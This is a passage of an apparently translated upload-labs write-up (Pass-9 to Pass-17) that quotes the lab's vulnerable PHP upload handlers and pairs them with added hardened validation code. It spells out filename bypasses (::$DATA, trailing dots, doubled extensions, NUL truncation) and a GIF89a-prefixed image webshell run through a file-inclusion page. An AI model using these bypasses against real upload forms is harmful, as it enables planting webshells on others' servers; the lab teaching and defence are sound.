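// Covers the inputs from Pass-9 (::$DATA), Pass-10 ("php.php. .") and
// Pass-11 (double-written "pphphp"). All names here are ours.

const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];

/**
 * Return the lower-cased extension the file would really have on disk,
 * or null when the name is unusable.
 */
function canonicalExtension(string $clientName): ?string
{
    // NTFS alternate data streams: "shell.php::$DATA" and "shell.php:foo" both
    // end up writing to shell.php, so everything from the first ':' is dropped.
    $name = explode(':', $clientName, 2)[0];

    // Windows strips trailing dots and spaces when it creates a file, so
    // "php.php. ." becomes "php.php". rtrim removes any run of both characters.
    $name = rtrim($name, ". ");

    // A bare file name must carry neither directory separators nor NUL bytes.
    if ($name === '' || strpos($name, "\0") !== false || strpbrk($name, "/\\") !== false) {
        return null;
    }

    $ext = pathinfo($name, PATHINFO_EXTENSION);
    return $ext === '' ? null : strtolower($ext);
}

/**
 * Decide whether an upload with this client name may be stored and, if so,
 * return the server-chosen name it is stored under. The client influences
 * nothing but the (whitelisted) extension.
 */
function storedName(string $clientName): ?string
{
    $ext = canonicalExtension($clientName);
    if ($ext === null || !in_array($ext, ALLOWED_EXT, true)) {
        return null;   // reject; never try to repair a bad name
    }
    return bin2hex(random_bytes(8)) . '.' . $ext;
}

// Self-check over the names used in the Pass-9/10/11 write-ups plus a few
// benign ones (all constructed inputs).
function selfCheck(): bool
{
    $mustReject = ['1.php::$DATA', 'php.php. .', 'test.pphphp', 'shell.php.',
                   'shell.pHp', '.htaccess', 'x.php/../y.jpg'];
    $mustAccept = ['photo.JPG', 'cat.png', 'anim.gif. .'];
    foreach ($mustReject as $n) {
        if (storedName($n) !== null) {
            return false;
        }
    }
    foreach ($mustAccept as $n) {
        if (storedName($n) === null) {
            return false;
        }
    }
    return true;
}

var_dump(selfCheck());
```

<p>Run it with the <code>php</code> CLI; <code>selfCheck()</code> feeds in the names from the three passes. The property that matters is that the extension being tested is computed from the name that will really exist on disk, so none of the three tricks changes what <code>in_array</code> sees, and because the stored name is generated server-side a name like <code>x.php.jpg</code> never reaches the file system either.</p>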
<h2 id="Pass-12-00截断"><a href="#Pass-12-00截断" class="headerlink" title="Pass-12 %00 truncation"></a>Pass-12 %00 truncation</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$ext_arr</span> = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="title function_ invoke__">strrpos</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>,<span class="variable">$ext_arr</span>)){</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = <span class="variable">$_GET</span>[<span class="string">'save_path'</span>].<span class="string">"/"</span>.<span class="title function_ invoke__">rand</span>(<span class="number">10</span>, <span class="number">99</span>).<span class="title function_ invoke__">date</span>(<span 
class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_ext</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)){</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>The hint says the file path in this Pass is controllable. The check is a whitelist, but <code>$img_path</code> is built by direct concatenation, so <code>%00</code> truncation can be used to bypass it.</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$img_path</span> = <span class="variable">$_GET</span>[<span class="string">'save_path'</span>].<span class="string">"/"</span>.<span class="title function_ invoke__">rand</span>(<span class="number">10</span>, <span class="number">99</span>).<span class="title function_ invoke__">date</span>(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_ext</span>;</span><br></pre></td></tr></table></figure>
<p>However, %00 truncation only works when the following conditions are met:</p>
<ul>
<li>PHP version lower than 5.3.4</li>
<li>PHP's magic_quotes_gpc set to OFF</li>
</ul>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726022129029.png" alt="image-20200726022129029"></p>
<p>Because PHP 7.x is used here, the conditions for %00 truncation cannot be met.<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582693345-95671-upload-labs12-2.png" alt="img"></p>
<h2 id="Pass-13-00截断"><a href="#Pass-13-00截断" class="headerlink" title="Pass-13 %00 truncation"></a>Pass-13 %00 truncation</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$ext_arr</span> = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="title function_ invoke__">strrpos</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>,<span class="variable">$ext_arr</span>)){</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = <span class="variable">$_POST</span>[<span class="string">'save_path'</span>].<span class="string">"/"</span>.<span class="title function_ invoke__">rand</span>(<span class="number">10</span>, <span class="number">99</span>).<span class="title function_ invoke__">date</span>(<span 
class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_ext</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)){</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传失败"</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>Pass-12 URL-decodes its input, turning %00 into 0x00, whereas Pass-13 has no URL-decoding step, so the byte is edited directly in the hex view to produce the 0x00 truncation.</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726101622367.png" alt="image-20200726101622367"></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726101816827.png" alt="image-20200726101816827"></p>
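<p>Pass-12 and Pass-13 work only because the destination directory comes from the request and is glued to the generated name by string concatenation, so on PHP before 5.3.4 a NUL byte hands the client control of the whole path. As an added example (ours, not the lab's code), the snippet below first models what a NUL-terminated C path API sees of such a string, then shows a version of the save logic in which the directory is fixed in configuration, client data containing <code>\0</code> is rejected up front, and the final path is verified to lie inside that directory before <code>move_uploaded_file</code> is called. <code>UPLOAD_DIR</code>, <code>destinationPath</code>, <code>effectivePathOnLegacyPhp</code> and the other names are ours; PHP 7.1 or later is assumed.</p>

```php
<?php
// Added example, not upload-labs code. All names here are ours.

const UPLOAD_DIR  = __DIR__ . '/upload';   // fixed server-side, never taken from the request
const ALLOWED_EXT = ['jpg', 'png', 'gif'];

/**
 * What a NUL-terminated C path API (the layer PHP < 5.3.4 handed paths to)
 * sees of a PHP string: everything after the first "\0" is invisible.
 * This is the whole mechanism behind the Pass-12/13 trick; the function only
 * exists to make it visible.
 */
function effectivePathOnLegacyPhp(string $path): string
{
    $nul = strpos($path, "\0");
    return $nul === false ? $path : substr($path, 0, $nul);
}

/** True when client-supplied data carries a NUL byte; no legitimate name does. */
function containsNul(string $s): bool
{
    return strpos($s, "\0") !== false;
}

/**
 * Build the destination for an upload, or return null on any rejection.
 * Only the extension is derived from the client; directory and base name are
 * chosen by the server, and the result is checked to sit inside UPLOAD_DIR.
 */
function destinationPath(string $clientName): ?string
{
    if (containsNul($clientName)) {
        return null;
    }
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    $dir = realpath(UPLOAD_DIR);
    if ($dir === false || !is_dir($dir)) {
        return null;   // the directory must already exist; it is never created from request data
    }
    $path = $dir . DIRECTORY_SEPARATOR . bin2hex(random_bytes(8)) . '.' . $ext;
    // Containment: the directory component of the final path must be exactly $dir.
    return dirname($path) === $dir ? $path : null;
}

/** The lab's flow with the hardened path logic; $file is one entry of $_FILES. */
function handleUpload(array $file): array
{
    $dest = destinationPath((string) ($file['name'] ?? ''));
    if ($dest === null) {
        return ['ok' => false, 'msg' => 'rejected'];
    }
    // move_uploaded_file itself refuses NUL-bearing paths on PHP >= 5.3.4, but
    // with the checks above no such path is ever built.
    if (!is_uploaded_file($file['tmp_name']) || !move_uploaded_file($file['tmp_name'], $dest)) {
        return ['ok' => false, 'msg' => 'move failed'];
    }
    return ['ok' => true, 'path' => $dest];
}

// Constructed inputs mirroring the Pass-12/13 attempts.
function selfCheck(): bool
{
    // The lab's concatenation with a save_path that carries a NUL byte: the
    // random number, timestamp and ".jpg" vanish behind the NUL.
    $legacy    = effectivePathOnLegacyPhp("upload/x.php\0" . '/' . '42' . date('YmdHis') . '.jpg');
    $truncated = ($legacy === 'upload/x.php');

    // The hardened builder rejects the NUL and the non-image extension up front.
    $rejected = destinationPath("x.php\0.jpg") === null && destinationPath('x.php') === null;

    return $truncated && $rejected;
}

var_dump(selfCheck());
```

<p>The self-check only exercises the rejections, because an accepted name additionally needs the upload directory to exist; create <code>upload/</code> next to the script to see <code>destinationPath('photo.jpg')</code> return a path. Keeping that directory outside the web root, or serving it with script execution disabled, is the second layer the page's later passes make the case for.</p>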
<h2 id="Pass-14-图片马绕过"><a href="#Pass-14-图片马绕过" class="headerlink" title="Pass-14 image webshell bypass"></a>Pass-14 image webshell bypass</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getReailFileType</span>(<span class="params"><span class="variable">$filename</span></span>)</span>{</span><br><span class="line"> <span class="variable">$file</span> = <span class="title function_ invoke__">fopen</span>(<span class="variable">$filename</span>, <span class="string">"rb"</span>);</span><br><span class="line"> <span class="variable">$bin</span> = <span class="title function_ invoke__">fread</span>(<span class="variable">$file</span>, <span class="number">2</span>); <span class="comment">//read only 2 bytes</span></span><br><span class="line"> <span class="title function_ invoke__">fclose</span>(<span class="variable">$file</span>);</span><br><span class="line"> <span class="variable">$strInfo</span> = @<span class="title function_ invoke__">unpack</span>(<span class="string">"C2chars"</span>, <span class="variable">$bin</span>); </span><br><span class="line"> <span class="variable">$typeCode</span> = <span class="title function_ invoke__">intval</span>(<span class="variable">$strInfo</span>[<span class="string">'chars1'</span>].<span class="variable">$strInfo</span>[<span class="string">'chars2'</span>]); </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">''</span>; </span><br><span class="line"> <span class="keyword">switch</span>(<span class="variable">$typeCode</span>){ </span><br><span class="line"> <span class="keyword">case</span> <span class="number">255216</span>: </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">'jpg'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">13780</span>: </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">'png'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> <span class="number">7173</span>: </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">'gif'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">default</span>: </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">'unknown'</span>;</span><br><span class="line"> } </span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$fileType</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$file_type</span> = <span class="title function_ invoke__">getReailFileType</span>(<span class="variable">$temp_file</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$file_type</span> == <span class="string">'unknown'</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span 
class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">"/"</span>.<span class="title function_ invoke__">rand</span>(<span class="number">10</span>, <span class="number">99</span>).<span class="title function_ invoke__">date</span>(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_type</span>;</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)){</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>As can be seen, Pass14 also has to be combined with a file inclusion vulnerability, which is a fairly clear hint that an image webshell is needed and is then executed through file inclusion; so we upload an image webshell directly.<br>Since GIF is allowed, we use the GIF signature prefix <code>GIF89a</code>.</p>
<p>First write a phpinfo file, pass14.php:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">GIF89a</span><br><span class="line"><?php</span><br><span class="line">phpinfo();</span><br><span class="line">?></span><br></pre></td></tr></table></figure>
<p>Then rename <code>pass14.php</code> to <code>pass14.gif</code></p>
<p>Upload the GIF image webshell directly:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582773548-215050-upload-labs14-2.png" alt="img"></p>
<p>The file is uploaded successfully:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582773596-912022-upload-labs14-3.png" alt="img"></p>
<p>Pass14 provides an <code>include.php</code> file; after the upload, <code>include.php</code> is used to include <code>pass14.gif</code></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">include.php?file=upload/**.gif</span><br></pre></td></tr></table></figure>
<p>File inclusion:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726102909903.png" alt="image-20200726102909903"></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">This page contains a file inclusion vulnerability and is used to test whether an image webshell runs correctly!</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">"Content-Type:text/html;charset=utf-8"</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$file</span>)){</span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$file</span>;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> <span class="title function_ invoke__">show_source</span>(__file__);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<h2 id="Pass-15-getimagesize-图片马"><a href="#Pass-15-getimagesize-图片马" class="headerlink" title="Pass-15 getimagesize() image webshell"></a>Pass-15 getimagesize() image webshell</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isImage</span>(<span class="params"><span class="variable">$filename</span></span>)</span>{</span><br><span class="line"> <span class="variable">$types</span> = <span class="string">'.jpeg|.png|.gif'</span>;</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">file_exists</span>(<span class="variable">$filename</span>)){</span><br><span class="line"> <span class="variable">$info</span> = <span class="title function_ invoke__">getimagesize</span>(<span class="variable">$filename</span>);</span><br><span class="line"> <span class="variable">$ext</span> = <span class="title function_ invoke__">image_type_to_extension</span>(<span class="variable">$info</span>[<span class="number">2</span>]);</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">stripos</span>(<span class="variable">$types</span>,<span class="variable">$ext</span>)>=<span class="number">0</span>){</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$ext</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span 
class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$res</span> = <span class="title function_ invoke__">isImage</span>(<span class="variable">$temp_file</span>);</span><br><span class="line"> <span class="keyword">if</span>(!<span class="variable">$res</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">"/"</span>.<span class="title function_ invoke__">rand</span>(<span class="number">10</span>, <span class="number">99</span>).<span class="title function_ invoke__">date</span>(<span class="string">"YmdHis"</span>).<span class="variable">$res</span>;</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)){</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>The <code>getimagesize</code> function is used to check the file type; it returns an array like this:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="title function_ invoke__">Array</span></span><br><span class="line">(</span><br><span class="line"> [<span class="number">0</span>] => <span class="number">350</span></span><br><span class="line"> [<span class="number">1</span>] => <span class="number">318</span></span><br><span class="line"> [<span class="number">2</span>] => <span class="number">2</span> <span class="comment">// where 1 = GIF, 2 = JPG, 3 = PNG, 4 = SWF, 5 = PSD, 6 = BMP, 7 = TIFF (Intel byte order), 8 = TIFF (Motorola byte order), 9 = JPC, 10 = JP2, 11 = JPX, 12 = JB2, 13 = SWC, 14 = IFF, 15 = WBMP, 16 = XBM</span></span><br><span class="line"> [<span class="number">3</span>] => width=<span class="string">"350"</span> height=<span class="string">"318"</span></span><br><span class="line"> [bits] => <span class="number">8</span></span><br><span class="line"> [channels] => <span class="number">3</span></span><br><span class="line"> [mime] => image/jpeg</span><br><span class="line">)</span><br></pre></td></tr></table></figure>
<p>For ways to bypass <code>getimagesize</code>, see: <a href="https://0x1.im/blog/php/php-function-getimagesize.html">https://0x1.im/blog/php/php-function-getimagesize.html</a><br>The bypass is the same as in Pass-14<br>Change the file header signature to <code>GIF89a</code> (prepend it at the start of the file, or edit the hex: <code>47 49 46 38 39 61</code>)</p>
<h2 id="Pass-16-exif-imagetype-图片马"><a href="#Pass-16-exif-imagetype-图片马" class="headerlink" title="Pass-16-exif_imagetype()-图片马"></a>Pass-16-exif_imagetype()-image webshell</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isImage</span>(<span class="params"><span class="variable">$filename</span></span>)</span>{</span><br><span class="line"> <span class="comment">// the php_exif extension must be enabled</span></span><br><span class="line"> <span class="variable">$image_type</span> = <span class="title function_ invoke__">exif_imagetype</span>(<span class="variable">$filename</span>);</span><br><span class="line"> <span class="keyword">switch</span> (<span class="variable">$image_type</span>) {</span><br><span class="line"> <span class="keyword">case</span> IMAGETYPE_GIF:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"gif"</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> IMAGETYPE_JPEG:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"jpg"</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> IMAGETYPE_PNG:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"png"</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span 
class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$res</span> = <span class="title function_ invoke__">isImage</span>(<span class="variable">$temp_file</span>);</span><br><span class="line"> <span class="keyword">if</span>(!<span class="variable">$res</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">"/"</span>.<span class="title function_ invoke__">rand</span>(<span class="number">10</span>, <span class="number">99</span>).<span class="title function_ invoke__">date</span>(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$res</span>;</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)){</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>The <code>exif_imagetype</code> function detects whether the uploaded file is an image. It behaves like Pass-15, so the bypass is the same: the GIF image webshell from the previous pass works here too.</p>
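<p>Two things in the Pass-15 and Pass-16 checks matter from the defender's side: the loose <code>stripos(...) >= 0</code> comparison, and the fact that <code>getimagesize</code>/<code>exif_imagetype</code> only sniff the leading bytes of the file. The following PHP is an added example, not upload-labs code; <code>ALLOWED_IMAGE_TYPES</code>, <code>detectImageExtension</code>, <code>labLooseCheck</code> and <code>labStrictCheck</code> are names made up here, and the GIF-prefixed file is constructed inside the script.</p>

```php
<?php
// Added example (not upload-labs code): why the Pass-15/16 checks are weak and
// how to validate the detected image type strictly. Two points are shown:
//  1. stripos() returns false when the needle is absent, and in PHP
//     `false >= 0` is true, so the lab's `stripos($types,$ext)>=0` accepts every
//     extension image_type_to_extension() can produce, not just jpeg/png/gif.
//  2. getimagesize()/exif_imagetype() only sniff the leading bytes, so a file
//     that merely starts with a GIF signature is reported as IMAGETYPE_GIF.
//     Signature sniffing identifies the container, not that the content is
//     harmless; it has to be paired with a server-chosen name and a directory
//     from which PHP never executes or include()s files.

/** Strict allow-list: detected IMAGETYPE_* constant => extension the server uses. */
const ALLOWED_IMAGE_TYPES = [
    IMAGETYPE_GIF  => 'gif',
    IMAGETYPE_JPEG => 'jpg',
    IMAGETYPE_PNG  => 'png',
];

/** Extension to store the upload under, or null when it is rejected. */
function detectImageExtension(string $path): ?string
{
    if (!is_file($path)) {
        return null;
    }
    if (function_exists('exif_imagetype')) {      // needs the exif extension
        $type = @exif_imagetype($path);
    } else {
        $info = @getimagesize($path);
        $type = ($info === false) ? false : $info[2];
    }
    if ($type === false) {
        return null;
    }
    // Strict lookup: anything outside the allow-list (BMP, SWF, PSD, ...) is rejected.
    return ALLOWED_IMAGE_TYPES[$type] ?? null;
}

/** The lab's loose comparison, kept only to show the false >= 0 bug. */
function labLooseCheck(string $ext): bool
{
    return stripos('.jpeg|.png|.gif', $ext) >= 0;
}

/** Corrected comparison: test for "not found" explicitly. */
function labStrictCheck(string $ext): bool
{
    return stripos('.jpeg|.png|.gif', $ext) !== false;
}

// --- demonstration on a constructed file -------------------------------------
// GIF signature, a 1x1 logical screen descriptor, then text instead of pixel data.
$fake = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($fake, "GIF89a\x01\x00\x01\x00\x00" . "text, not pixels");

printf("loose check accepts '.bmp'?  %s\n", labLooseCheck('.bmp') ? 'yes' : 'no');
printf("strict check accepts '.bmp'? %s\n", labStrictCheck('.bmp') ? 'yes' : 'no');
printf("sniffed extension of fake:   %s\n", detectImageExtension($fake) ?? '(rejected)');
// The fake is still classified as gif: the safe outcome relies on it being
// stored as "<random>.gif" in a non-executable directory, never on the sniff.
unlink($fake);
```

<p>The strict version maps the detected <code>IMAGETYPE_*</code> constant to a fixed extension and ignores both the client's file name and <code>image_type_to_extension()</code>. The constructed file is still classified as a GIF, which is the point: the server-chosen extension and the non-executable storage location, not the signature check, are what keep the host safe.</p>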
<h2 id="Pass-17-二次渲染绕过"><a href="#Pass-17-二次渲染绕过" class="headerlink" title="Pass-17-二次渲染绕过"></a>Pass-17-Re-rendering bypass</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="comment">// basic information about the uploaded file: name, type, size, temporary path</span></span><br><span class="line"> <span class="variable">$filename</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> <span class="variable">$filetype</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>];</span><br><span class="line"> <span class="variable">$tmpname</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"></span><br><span class="line"> <span class="variable">$target_path</span>=UPLOAD_PATH.<span class="string">'/'</span>.<span class="title function_ invoke__">basename</span>(<span class="variable">$filename</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// extension of the uploaded file</span></span><br><span class="line"> <span class="variable">$fileext</span>= <span class="title function_ invoke__">substr</span>(<span class="title function_ invoke__">strrchr</span>(<span class="variable">$filename</span>,<span class="string">"."</span>),<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// check extension and MIME type; upload only if both are allowed</span></span><br><span class="line"> <span 
